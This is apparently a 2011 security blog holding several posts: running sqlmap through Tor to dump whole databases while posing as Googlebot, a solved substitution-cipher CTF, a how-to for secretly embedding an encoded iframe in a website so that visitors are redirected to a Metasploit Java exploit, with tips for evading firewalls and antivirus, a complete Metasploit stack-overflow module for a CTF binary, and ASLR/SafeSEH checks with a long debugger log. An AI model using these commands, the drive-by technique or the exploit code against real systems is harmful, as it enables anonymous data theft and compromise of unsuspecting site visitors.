2011-04-14T10:45:00.001+03:00

There is no better tool at the moment for blind SQL injection than sqlmap. If you don’t use it you should definitely have a look on it. With the latest additions sqlmap supports tor with a command line switch, –tor. Let’s proceed with an installation. My system is debian/ubuntu based but the installation is almost the same for any unix based distribution. Following the instructions, https://www.torproject.org/docs/debian.html.en#ubuntu ,

Add this line to your /etc/apt/sources.list file:

deb http://deb.torproject.org/torproject.org <DISTRIBUTION> main

where you put the codename of your distribution (i.e. lenny, sid, maverick or whatever it is) in place of <DISTRIBUTION>.

Then add the gpg key used to sign the packages by running the following commands at your command prompt:

gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

Now refresh your sources and install Tor by running the following commands (as root) at your command prompt:

apt-get update
apt-get install tor tor-geoipdb

Start tor, with /etc/init.d/tor start and grab a copy of polito config file from https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf , rename or move the old file in /etc/polipo/config and use the configuration from the URL.Restart polipo with /etc/init.d/polipo restart.

Get sqlmap from the latest svn trunk using

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap

Now you can use sqlmap with –tor with the following command,

~/sqlmap# ./sqlmap.py -u http://URL/index.php?cata_id=1 --dump-all –tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" and your requests will appear like an anonymous google bot getting information from the website.

another ctf from novaha

2011-04-13T17:08:00.001+03:00

A crypto ctf this time from NoVA great group. This time the challenge was a to decipher a text. The give text was the following,

Cipher text:

NDJJE ETD’RF Y NTE ZYHF Y NUA PTUBF
KIYEUP’ UP WGF BWRFFW ATPPY NF Y NUA ZYP BTZF JYE

ETD ATW ZDJ TP ET’ XYVF
ETD NUA JUBARYVF
HUVHUP’ ETDR VYP YII TSFR WGF KIYVF

MF MUII MF MUII RTVH ETD
MF MUII MF MUII RTVH ETD

NDJJE ETD’RF Y ETDPA ZYP GYRJ ZYP
BGTDWUP’ UP WGF BWRFFW ATPPY WYHF TP WGF MTRIJ BTZF JYE
ETD ATW NITTJ TP ET’ XYVF
ETD NUA JUBARYVF
MYSUP’ ETDR NYPPFR YII TSFR WGF KIYVF

MF MUII MF MUII RTVH ETD
MF MUII MF MUII RTVH ETD

NDJJE ETD’RF YP TIJ ZYP KTTR ZYP
KIFYJUP’ MUWG ETDR FEFB ATPPY ZYHF ETD BTZF KFYVF BTZF JYE

ETD ATW ZDJ TP ETDR XYVF
ETD NUA JUBARYVF
BTZFNTJE NFWWFR KDW ETD NYVH UP ETDR KIYVF

MF MUII MF MUII RTVH ETD
MF MUII MF MUII RTVH ETD

The challenge this time was easy since at the website the author provided a lot of information about substitution ciphers and also a nice tool to measure the occurrences of each letter. The link for the tool is, http://novactf.org/challenges/challenge-march-2011/rubyscript/ and the output on the text above is the following,

[A => 15]       2.94%
[B => 13]       2.54%
[D => 30]       5.87%
[E => 35]       6.85%
[F => 53]       10.37%
[G => 8]        1.57%
[H => 12]       2.35%
[I => 36]       7.05%
[J => 20]       3.91%
[K => 8]        1.57%
[M => 27]       5.28%
[N => 15]       2.94%
[P => 29]       5.68%
[R => 26]       5.09%
[S => 3]        0.59%
[T => 58]       11.35%
[U => 31]       6.07%
[V => 19]       3.72%
[W => 18]       3.52%
[X => 3]        0.59%
[Y => 38]       7.44%
[Z => 14]       2.74%

From http://en.wikipedia.org/wiki/Letter_frequency. We can assume, based on the frequency of possible occurrences for a start, that letters T and or F on the cipher text are one of the following e, t, a, or o. Since the author of the challenge already describe that he kept punctuation and format of the original text we can try to substitute using sed T and F accordingly. I won’t take this long this was an easy challenge, there are not many common words in English that have 2 letters and the second is e. That comes by substituting F with e, also we have the pattern MF MUII MF MUII RTVH ETD the second word, MUII has 2 occurrences of the same letters at the end, we can look for that at, http://www.morewords.com . Keeping it sort,

will result on the following,

NuJJy youY Noy ZYke Y NiA PoiBe
KlYyiP WGe BWreeW AoPPY Ne Y NiA ZYP BoZe JYy

you AoW ZuJ oP yoce
you NiA JiBArYce
kickiPur cYP Yll oSer WGe KlYce

we will we will rock you
we will we will rock you

NuJJy youY youPA ZYP GYrJ ZYP
BGouWiP WGe BWreeW AoPPY WYke oP WGe worlJ BoZe JYy
you AoW NlooJ oP yoce
you NiA JiBArYce
wYSiPur NYPPer Yll oSer WGe KlYce

we will we will rock you
we will we will rock you

NuJJy youYP olJ ZYP Koor ZYP
KleYJiPWG your eyeB AoPPY ZYke you BoZe KeYce BoZe JYy

you AoW ZuJ oP your XYce
you NiA JiBArYce
BoZeNoJy NeWWer KuW you NYck iP your KlYce

we will we will rock you
we will we will rock you

I believe we don’t need more than that, we will rock you by Queen (http://www.lyrics007.com/Queen%20Lyrics/We%20Will%20Rock%20You%20Lyrics.html) .

Client site attack using java codebase trust

2011-04-07T21:40:00.001+03:00

Some times you have to play the bad guy card in order to achieve results. When XSS attacks are not helping you to redirect a victim to your exploit, during a pentest, a more indirect approach can do the trick. Using a normal legitimate URL to do your bits. The latest exploit module for java_codebase_trust from metasploit is ideal for such attacks. The setup, one domain, any dyndns service or simply a short/tiny url service. These days i prefer a normal domain name, dyndns services and tiny url addresses don't sound so legit for someone to trust. Another idea is a notification for newsletter removal, nobody likes unwanted newsletters, so a removal link is highly appreciated many times.

Our metasploit server, running on msfconsole with the following settings,

I prefer to use local port on 443 for the metasploit listener, since many firewalls won't even check if the traffic is actual https, they will just check the port number and allow the traffic. As for the payload the normal java meterpreter is sufficient and goes undetected on many antiviruses still now.

Adding a backdoor that will redirect a client from the website to the metasploit server can be done with the use of an iframe embedded on the actual html code of our site. Using an encoder also like, http://www.htmlguard.com/articles/wp-content/uploads/html-encryption.html we can encode our actual address to make it a bit harder on the first look to raise suspicion. In our case a redirect to the server with ip address 192.168.2.23 can be encoded ,

and from the options my favorite encoding is base64,

Adding html tags to the code, the following line can be inserted on any html/php file on our website.

What will happen is, that when some user will go to look on our website he will be redirected also with no warning or any other notice to the metasploit server running the java_codebase_trust exploit on ip address 192.168.2.23. If the client will be running a vulnerable java version we will have a meterpreter connection.

from exploit db to metasploit

2011-02-15T12:14:00.000+02:00

Couple of days ago, mubix at twitter posted a very nice link from http://cosine-security.blogspot.com/2011/02/metasploit-framework-wishlist.html . I got a few minutes today to separate the list a bit further so anybody that wants to work on it can look easier on things. The list is split according to vendors affected on the following files,

adobe
apple
centos
cisco
debian
fedora
google
hp
ibm
java
linux
microsoft
mozilla
oracle
others
php
proftpd
red_hat
solaris
suse
ubuntu
winamp

On the next few days I'm thinking to start porting some of them to metasploit modules and anybody that wants to do the same feel free to choose what you like to work on :)

List with vendors at http://chaos.deventum.com/research/0entropy.zip

From vulnerability to exploit under 5 min

2011-02-09T12:40:00.000+02:00

Almost a month ago in the excellent group of NOVA Hackers! ( http://novahackers.blogspot.com/ ), a group of security professionals, security enthusiasts and friends a capture the flag challenge was posted. In that challenge one should find a way to exploit a binary file ( http://novactf.org/files/ctf-january-2011-files.rar ) that is listening on a specific port and write a metasploit exploit module . The ctf challenge was not meant to be extremely difficult it was meant to be for fun. Let's see how using the proper tools, one can write a metasploit, exploit, module under 5 min.

Tools that you will need, and tools that i like to work with,
Immunity Debugger ( http://www.immunityinc.com/products-immdbg.shtml )
Pvefindaddr ( http://redmine.corelan.be:8800/projects/pvefindaddr )
Metasploit Framework ( http://www.metasploit.com/framework/download/ )

Let's see how simple could be to write a simple buffer overflow with the proper tools.

Phase 1.
Fire up the debugger open the file,

Phase 2.
Start the executable from the debugger, pressing F9 or the run button.

Phase 3.
Generate a string of characters and send it to crash the application using metasploit

Phase 4.
At this point the application is crashed and the debugger will be displaying an Access Violation, for our good chance several registers are overwritten also with our string,

Phase 5.
Pvefindaddr to the rescue! This is almost considering cheating writing an exploit with the help of pvefinaddr, let's make it quick then, execute !pvefindaddr suggest on the debugger and check the log for the results.

What else could we ask from the tool, maybe to write the metasploit module by itself and post it on the exploit-db.com :-)

Phase 6.
Take the data and put them in a nice metasploit module. What is left here is a proper jmp eax instruction, pvefindaddr again will give us what we need.

Phase 7.
Take a simple metasploit exploit template ( http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ ) or from any other module in the metasploit directory add your values and you are done !

#
# Custom metasploit exploit
# Written by Nicolas Krassas
# Date 24/01/2011
# This is initial version
#
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Custom vulnerable server stack overflow',
                        'Description'    => %q{
                                        This module exploits a stack overflow in a
                                        custom vulnerable server.
                                             },
                        'Author'         => [ 'Nicolas Krassas' ],
                        'Version'        => '$Revision: 9999 $',
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1000,
                                        'BadChars' => "",
                                },
                        'Platform'       => 'win',

                        'Targets'        =>
                                [
                                        ['Windows XP SP2 Eng',
                                          { 'Ret' => 0x662F3435, 'Offset' => 260 } ],
                                        ['Windows XP SP3 Eng',
                                        { 'Ret' => 0x662F3425, 'Offset' => 260 } ],
                                ],
                        'DefaultTarget' => 0,

                        'Privileged'     => false
                        ))

                        register_options(
                        [
                                Opt::RPORT(1337)
                        ], self.class)
       end

       def exploit
          connect

          junk = make_nops(target['Offset'])
          sploit = junk + [target.ret].pack('V') + make_nops(4) + payload.encoded
          sock.put(sploit)

          handler
          disconnect

       end
end

Did it took 5 min, maybe not but it's neither far from it. Another nice tutorial on metasploit exploit code development using pvefindaddr that you can find is from sickness at Exploit Development Made Easy with !pvefindaddr .

checking aslr, safeseh and more

2011-01-20T10:33:00.000+02:00

Couple days ago i notice a post from Didier Stevens on how to check aslr status for shell extensions ( http://blog.didierstevens.com/2011/01/18/quickpost-checking-aslr/ ). In his approach he is using an excellent tool, Process Explorer to list the modules. Another way of doing the same is using pvefindaddr and immunity debugger. Pvefindaddr is a great tool, http://redmine.corelan.be:8800/projects/pvefindaddr, that exploit writers should be at least aware of.

A different approach to check the modules for aslr status can be done using the following.

Grab a copy of pvefindaddr and copy it on pycommands directory of the Immunity debugger. Load the debugger, using administrator privileges on windows 7 and from file File, Attach, choose explorer.exe. You will see something like:

On the debugger now again, execute the command !pvefindaddr modules wait for a couple of seconds and open the log window, the following screen will appear,

There you will see all the modules and their status, shell extensions are also listed there, for example in my list i have the following extensions:

Log data
Address    Message
           Immunity Debugger 1.80.0.1 : Yggdrasil
           Need support? visit http://forum.immunityinc.com/
           Error accesing memory
           File 'C:\Windows\explorer.exe'
           [10:17:09] New process with ID 00000F4C created
           Main thread with ID 000010F4 created
76E2EE2A   New thread with ID 00000AD8 created
76E2D662   New thread with ID 000008CC created
7528C89D   New thread with ID 000013B4 created
75F145E9   New thread with ID 00000C5C created
75DC12E5   New thread with ID 0000111C created
75F145E9   New thread with ID 0000145C created
76E2D662   New thread with ID 00001094 created
73A617A4   New thread with ID 00000A04 created
76E2D662   New thread with ID 0000157C created
76E2D662   New thread with ID 000012DC created
76E2D662   New thread with ID 00001098 created
75F145E9   New thread with ID 00000DD4 created
75F145E9   New thread with ID 00000898 created
75F145E9   New thread with ID 000016DC created
75F145E9   New thread with ID 0000138C created
75F145E9   New thread with ID 00000FD8 created
739E2F69   New thread with ID 00000878 created
75F145E9   New thread with ID 00001674 created
75F145E9   New thread with ID 0000124C created
7528C89D   New thread with ID 00000B70 created
6FA452C9   New thread with ID 0000130C created
76E2D662   New thread with ID 00000AF4 created
65BB268A   New thread with ID 00001470 created
7528C89D   New thread with ID 00000C44 created
76E2D662   New thread with ID 0000079C created
75F145E9   New thread with ID 0000090C created
76E2D662   New thread with ID 00001110 created
76E2D662   New thread with ID 00001728 created
76E9D315   New thread with ID 00000708 created
00B80000   Modules C:\Windows\explorer.exe
020A0000   Modules C:\Program Files\TortoiseSVN\bin\TortoiseSVN.dll
042D0000   Modules C:\Program Files\Notepad++\NppShell_01.dll
04320000   Modules C:\Program Files\7-Zip\7-zip.dll
043F0000   Modules C:\Windows\system32\thumbcache.dll
05940000   Modules C:\Program Files\TortoiseSVN\bin\TortoiseStub.dll
05960000   Modules C:\Program Files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
10000000   Modules C:\Program Files\TortoiseSVN\bin\intl3_tsvn.dll
62890000   Modules C:\Windows\System32\SyncCenter.dll
65870000   Modules C:\Windows\System32\werconcpl.dll
65980000   Modules C:\Windows\system32\FXSRESM.DLL
65BB0000   Modules C:\Windows\system32\fxsst.dll
65D40000   Modules C:\Windows\System32\pnidui.dll
66EA0000   Modules c:\PROGRA~1\MIF707~1\shellext.dll
68BD0000   Modules C:\Windows\System32\ieframe.dll
69A80000   Modules C:\Windows\System32\bthprops.cpl
6AC60000   Modules C:\Windows\System32\Actioncenter.dll
6AD20000   Modules C:\Windows\System32\wscui.cpl
6AE40000   Modules C:\Windows\system32\ntshrui.dll
6AF20000   Modules C:\Windows\system32\msi.dll
6B4B0000   Modules C:\Windows\system32\imapi2.dll
6B550000   Modules C:\Windows\system32\NetworkExplorer.dll
6BAD0000   Modules C:\Windows\system32\PortableDeviceApi.dll
6BF10000   Modules C:\Windows\System32\WSCAPI.dll
6BF40000   Modules C:\Windows\system32\FXSAPI.dll
6BF80000   Modules C:\Windows\System32\provsvc.dll
6C050000   Modules C:\Windows\System32\wer.dll
6C0B0000   Modules C:\Windows\System32\gameux.dll
6C350000   Modules C:\Windows\System32\shdocvw.dll
6C380000   Modules C:\Windows\system32\actxprxy.dll
6C3E0000   Modules C:\Windows\System32\cscui.dll
6C450000   Modules C:\PROGRA~1\MICROS~3\Office14\1033\GrooveIntlResource.dll
             Invalid or compressed Image Export Directory
6CCC0000   Modules C:\PROGRA~1\MICROS~3\Office14\GROOVEEX.DLL
6D0D0000   Modules C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE14\Cultures\office.odf
6D600000   Modules C:\Windows\WinSxS\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.4974_none_51cdc180bbe4500f\ATL90.DLL
6D630000   Modules C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCR90.dll
6D7B0000   Modules C:\Windows\System32\UIAnimation.dll
6D7E0000   Modules C:\Windows\System32\hgcpl.dll
6D870000   Modules C:\Program Files\Internet Explorer\ieproxy.dll
6DB50000   Modules C:\Windows\system32\dxp.dll
6E240000   Modules C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4974_none_50940634bcb759cb\MSVCP90.dll
6E2F0000   Modules C:\Windows\System32\netprofm.dll
6E4B0000   Modules C:\Windows\system32\SHFOLDER.dll
6E540000   Modules C:\Windows\system32\WINSPOOL.DRV
6E6E0000   Modules C:\Windows\system32\EXPLORERFRAME.dll
6E970000   Modules C:\Windows\system32\PortableDeviceTypes.dll
6EAE0000   Modules C:\Windows\system32\msutb.dll
6ECB0000   Modules C:\Windows\system32\MPR.dll
6ECD0000   Modules C:\Windows\system32\LINKINFO.dll
6EE60000   Modules C:\Program Files\TortoiseSVN\bin\libaprutil_tsvn.dll
6EEC0000   Modules C:\Program Files\TortoiseSVN\bin\libapr_tsvn.dll
6F050000   Modules C:\Windows\system32\EhStorShell.dll
6F670000   Modules C:\Windows\system32\cscapi.dll
6FA40000   Modules C:\Windows\system32\Wlanapi.dll
70FA0000   Modules C:\Windows\system32\wlanutil.dll
71020000   Modules C:\Windows\system32\dhcpcsvc.DLL
713F0000   Modules C:\Windows\System32\WINNSI.DLL
71400000   Modules C:\Windows\System32\IPHLPAPI.DLL
71970000   Modules C:\Windows\system32\MsftEdit.dll
71A30000   Modules C:\Windows\system32\mssprxy.dll
71AA0000   Modules C:\Windows\system32\wwanapi.dll
71CD0000   Modules C:\Windows\system32\prnfldr.dll
71D40000   Modules C:\Windows\system32\BatMeter.dll
71E00000   Modules C:\Windows\System32\npmproxy.dll
71E20000   Modules C:\Windows\System32\QAgent.dll
71EA0000   Modules C:\Windows\system32\SYNCENG.dll
71EC0000   Modules C:\Windows\system32\syncui.dll
71F40000   Modules C:\Windows\System32\srchadmin.dll
71F90000   Modules C:\Program Files\WinRAR\rarext.dll
71FC0000   Modules C:\Windows\system32\twext.dll
71FF0000   Modules C:\Windows\System32\wercplsupport.dll
72010000   Modules C:\Windows\System32\framedynos.dll
721B0000   Modules C:\Windows\System32\cscobj.dll
72380000   Modules C:\Windows\System32\QUtil.dll
723A0000   Modules C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
72400000   Modules C:\Windows\system32\timedate.cpl
72480000   Modules C:\Windows\system32\EhStorAPI.dll
724B0000   Modules C:\Windows\system32\stobject.dll
72510000   Modules C:\Windows\System32\netshell.dll
72D90000   Modules C:\Windows\system32\dhcpcsvc6.DLL
72DD0000   Modules C:\Windows\System32\msxml6.dll
72F50000   Modules C:\Windows\system32\es.dll
72FA0000   Modules C:\Windows\system32\slc.dll
72FC0000   Modules C:\Windows\system32\ATL.DLL
730F0000   Modules C:\Windows\system32\taskschd.dll
731B0000   Modules C:\Windows\system32\POWRPROF.dll
73270000   Modules C:\Windows\System32\nlaapi.dll
734B0000   Modules C:\Windows\system32\ntmarta.dll
734F0000   Modules C:\Windows\system32\wwapi.dll
73500000   Modules C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
73510000   Modules C:\Windows\System32\wscinterop.dll
73530000   Modules C:\Windows\system32\SndVolSSO.DLL
73570000   Modules C:\Windows\System32\OLEACC.dll
73640000   Modules C:\Windows\System32\CSCDLL.dll
73650000   Modules C:\Windows\system32\wpdshserviceobj.dll
73690000   Modules C:\Windows\system32\AUDIOSES.DLL
736D0000   Modules C:\Windows\system32\msls31.dll
73700000   Modules C:\Windows\System32\AltTab.dll
73710000   Modules C:\Windows\ehome\ehSSO.dll
73720000   Modules C:\Windows\System32\shacct.dll
73750000   Modules C:\Windows\system32\wkscli.dll
73760000   Modules C:\Windows\system32\netutils.dll
73890000   Modules C:\Windows\system32\WindowsCodecs.dll
73990000   Modules C:\Windows\System32\XmlLite.dll
739C0000   Modules C:\Windows\system32\dwmapi.dll
739E0000   Modules C:\Windows\System32\MMDevApi.dll
73A20000   Modules C:\Windows\system32\HID.DLL
73A50000   Modules C:\Windows\System32\hcproviders.dll
73A60000   Modules C:\Windows\system32\msiltcfg.dll
73A70000   Modules C:\Windows\system32\DUser.dll
73AA0000   Modules C:\Windows\system32\DUI70.dll
73B60000   Modules C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7600.16385_none_72fc7cbf861225ca\gdiplus.dll
73CF0000   Modules C:\Windows\system32\UxTheme.dll
73D30000   Modules C:\Windows\system32\PROPSYS.dll
73E30000   Modules C:\Windows\system32\SAMLIB.dll
73E50000   Modules C:\Windows\system32\Syncreg.dll
73E60000   Modules C:\Windows\system32\IconCodecService.dll
73E70000   Modules C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll
74010000   Modules C:\Windows\system32\CRYPTUI.dll
74110000   Modules C:\Windows\system32\authui.dll
74340000   Modules C:\Windows\system32\WTSAPI32.dll
74410000   Modules C:\Windows\system32\VERSION.dll
74570000   Modules C:\Windows\system32\USERENV.dll
74750000   Modules C:\Windows\system32\DEVRTL.dll
74770000   Modules C:\Windows\system32\rsaenh.dll
74850000   Modules C:\Windows\system32\dnsapi.DLL
74990000   Modules C:\Windows\system32\MSWSOCK.dll
749D0000   Modules C:\Windows\system32\CRYPTSP.dll
74B90000   Modules C:\Windows\System32\wevtapi.dll
74DA0000   Modules C:\Windows\system32\srvcli.dll
74E10000   Modules C:\Windows\system32\Secur32.dll
74E30000   Modules C:\Windows\system32\SSPICLI.DLL
74E50000   Modules C:\Windows\system32\apphelp.dll
74EA0000   Modules C:\Windows\system32\CRYPTBASE.dll
74EB0000   Modules C:\Windows\system32\SXS.DLL
74F10000   Modules C:\Windows\System32\WINSTA.dll
74F40000   Modules C:\Windows\system32\RpcRtRemote.dll
74F50000   Modules C:\Windows\system32\profapi.dll
             Invalid or compressed Image Export Directory
74FC0000   Modules C:\Windows\system32\MSASN1.dll
75060000   Modules C:\Windows\system32\CRYPT32.dll
75180000   Modules C:\Windows\system32\WINTRUST.dll
751B0000   Modules C:\Windows\system32\CFGMGR32.dll
751E0000   Modules C:\Windows\system32\KERNELBASE.dll
75230000   Modules C:\Windows\system32\DEVOBJ.dll
75250000   Modules C:\Windows\system32\NSI.dll
75260000   Modules C:\Windows\system32\ole32.dll
753C0000   Modules C:\Windows\system32\GDI32.dll
75470000   Modules C:\Windows\system32\WININET.dll
75570000   Modules C:\Windows\system32\RPCRT4.dll
75620000   Modules C:\Windows\system32\kernel32.dll
75700000   Modules C:\Windows\system32\OLEAUT32.dll
75790000   Modules C:\Windows\system32\urlmon.dll
758D0000   Modules C:\Windows\system32\PSAPI.DLL
758E0000   Modules C:\Windows\system32\USER32.dll
759B0000   Modules C:\Windows\system32\WS2_32.dll
759F0000   Modules C:\Windows\system32\MSCTF.dll
75AC0000   Modules C:\Windows\system32\IMM32.dll
75AE0000   Modules C:\Windows\SYSTEM32\sechost.dll
75B80000   Modules C:\Windows\system32\SETUPAPI.dll
75D20000   Modules C:\Windows\system32\CLBCatQ.DLL
75DB0000   Modules C:\Windows\system32\msvcrt.dll
75E60000   Modules C:\Windows\system32\USP10.dll
75F00000   Modules C:\Windows\system32\SHLWAPI.dll
75F60000   Modules C:\Windows\system32\SHELL32.dll
76BB0000   Modules C:\Windows\system32\WLDAP32.dll
76C00000   Modules C:\Windows\system32\iertutil.dll
76E00000   Modules C:\Windows\SYSTEM32\ntdll.dll
76F40000   Modules C:\Windows\system32\LPK.dll
76F50000   Modules C:\Windows\system32\Normaliz.dll
76F60000   Modules C:\Windows\system32\ADVAPI32.dll
76E33574   [10:17:20] Attached process paused at ntdll.DbgBreakPoint
0BADF00D
0BADF00D
0BADF00D
0BADF00D   ** [+] Gathering executable / loaded module info, please wait...
0BADF00D   ** [+] Finished task, 170 modules found
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Loaded modules
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D     Fixup |   Base     |    Top     |    Size    | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D   ----------------------------------------------------------------------------------------------------------------------------------
0BADF00D      yes   | 0x72010000 | 0x72045000 | 0x00035000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - framedynos.dll : C:\Windows\System32\framedynos.dll
0BADF00D      yes   | 0x74990000 | 0x749CC000 | 0x0003C000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - MSWSOCK.dll : C:\Windows\system32\MSWSOCK.dll
0BADF00D      yes   | 0x72400000 | 0x72478000 | 0x00078000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - timedate.cpl : C:\Windows\system32\timedate.cpl
0BADF00D      yes   | 0x6ECD0000 | 0x6ECD9000 | 0x00009000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - LINKINFO.dll : C:\Windows\system32\LINKINFO.dll
0BADF00D      yes   | 0x74FC0000 | 0x74FCC000 | 0x0000C000 |   yes   | yes |    yes   |   yes | 6.1.7600.16415 - MSASN1.dll : C:\Windows\system32\MSASN1.dll
0BADF00D      yes   | 0x6E4B0000 | 0x6E4B5000 | 0x00005000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - SHFOLDER.dll : C:\Windows\system32\SHFOLDER.dll
0BADF00D      yes   | 0x71970000 | 0x71A04000 | 0x00094000 |   yes   | yes |    yes   |   yes | 5.41.21.2509 - MsftEdit.dll : C:\Windows\system32\MsftEdit.dll
0BADF00D      yes   | 0x736D0000 | 0x736FA000 | 0x0002A000 |   yes   | yes |    yes   |   yes | 3.10.349.0 - msls31.dll : C:\Windows\system32\msls31.dll
0BADF00D      yes   | 0x739C0000 | 0x739D3000 | 0x00013000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - dwmapi.dll : C:\Windows\system32\dwmapi.dll
0BADF00D      yes   | 0x730F0000 | 0x7316B000 | 0x0007B000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - taskschd.dll : C:\Windows\system32\taskschd.dll
0BADF00D      yes   | 0x6F050000 | 0x6F081000 | 0x00031000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - EhStorShell.dll : C:\Windows\system32\EhStorShell.dll
0BADF00D      yes   | 0x72FA0000 | 0x72FAA000 | 0x0000A000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - slc.dll : C:\Windows\system32\slc.dll
0BADF00D      yes   | 0x71FC0000 | 0x71FE7000 | 0x00027000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - twext.dll : C:\Windows\system32\twext.dll
0BADF00D      yes   | 0x734F0000 | 0x734FA000 | 0x0000A000 |   yes   | yes |    yes   |   yes | 08.01.02.00 - wwapi.dll : C:\Windows\system32\wwapi.dll
0BADF00D      yes   | 0x65870000 | 0x65976000 | 0x00106000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - werconcpl.dll : C:\Windows\System32\werconcpl.dll
0BADF00D      yes   | 0x73710000 | 0x73718000 | 0x00008000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - ehSSO.dll : C:\Windows\ehome\ehSSO.dll
0BADF00D      yes   | 0x73650000 | 0x7366D000 | 0x0001D000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - wpdshserviceobj.dll : C:\Windows\system32\wpdshserviceobj.dll
0BADF00D      yes   | 0x76C00000 | 0x76DFA000 | 0x001FA000 |   yes   | yes |    yes   |   yes | 8.00.7600.16700 - iertutil.dll : C:\Windows\system32\iertutil.dll
0BADF00D      yes   | 0x73D30000 | 0x73E25000 | 0x000F5000 |   yes   | yes |    yes   |   yes | 7.00.7600.16385 - PROPSYS.dll : C:\Windows\system32\PROPSYS.dll
0BADF00D      yes   | 0x74B90000 | 0x74BD2000 | 0x00042000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - wevtapi.dll : C:\Windows\System32\wevtapi.dll
0BADF00D      yes   | 0x724B0000 | 0x724E9000 | 0x00039000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - stobject.dll : C:\Windows\system32\stobject.dll
0BADF00D      yes   | 0x713F0000 | 0x713F7000 | 0x00007000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - WINNSI.DLL : C:\Windows\System32\WINNSI.DLL
0BADF00D      yes   | 0x75260000 | 0x753BC000 | 0x0015C000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - ole32.dll : C:\Windows\system32\ole32.dll
0BADF00D      yes   | 0x75F00000 | 0x75F57000 | 0x00057000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - SHLWAPI.dll : C:\Windows\system32\SHLWAPI.dll
0BADF00D      yes   | 0x72F50000 | 0x72F97000 | 0x00047000 |   yes   | yes |    yes   |   yes | 2001.12.8530.16385 - es.dll : C:\Windows\system32\es.dll
0BADF00D      yes   | 0x758E0000 | 0x759A9000 | 0x000C9000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - USER32.dll : C:\Windows\system32\USER32.dll
0BADF00D      yes   | 0x65BB0000 | 0x65C82000 | 0x000D2000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - fxsst.dll : C:\Windows\system32\fxsst.dll
0BADF00D      yes   | 0x6D7B0000 | 0x6D7CB000 | 0x0001B000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - UIAnimation.dll : C:\Windows\System32\UIAnimation.dll
0BADF00D      yes   | 0x6ECB0000 | 0x6ECC2000 | 0x00012000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - MPR.dll : C:\Windows\system32\MPR.dll
0BADF00D      yes   | 0x74010000 | 0x74108000 | 0x000F8000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - CRYPTUI.dll : C:\Windows\system32\CRYPTUI.dll
0BADF00D      yes   | 0x75180000 | 0x751AD000 | 0x0002D000 |   yes   | yes |    yes   |   yes | 6.1.7600.16493 - WINTRUST.dll : C:\Windows\system32\WINTRUST.dll
0BADF00D      yes   | 0x73890000 | 0x7398B000 | 0x000FB000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - WindowsCodecs.dll : C:\Windows\system32\WindowsCodecs.dll
0BADF00D      yes   | 0x73720000 | 0x7373E000 | 0x0001E000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - shacct.dll : C:\Windows\System32\shacct.dll
0BADF00D      yes   | 0x73570000 | 0x735AC000 | 0x0003C000 |   yes   | yes |    yes   |   yes | 7.0.0.0 - OLEACC.dll : C:\Windows\System32\OLEACC.dll
0BADF00D      yes   | 0x75F60000 | 0x76BA9000 | 0x00C49000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - SHELL32.dll : C:\Windows\system32\SHELL32.dll
0BADF00D      yes   | 0x73510000 | 0x7352A000 | 0x0001A000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - wscinterop.dll : C:\Windows\System32\wscinterop.dll
0BADF00D      yes   | 0x73640000 | 0x73649000 | 0x00009000 |   yes   | yes |    yes   |   yes | 6.1.7600.16385 - CSCDLL.dll : C:\Windows\System32\CSCDLL.dll
0BADF00D      yes   | 0x75D20000 | 0x75DA3000 | 0x00083000 |   yes   | yes |    yes   |   yes | 2001.12.8530.16385 - CLBCatQ.DLL : C:\Windows\system32\CLBCatQ.DLL
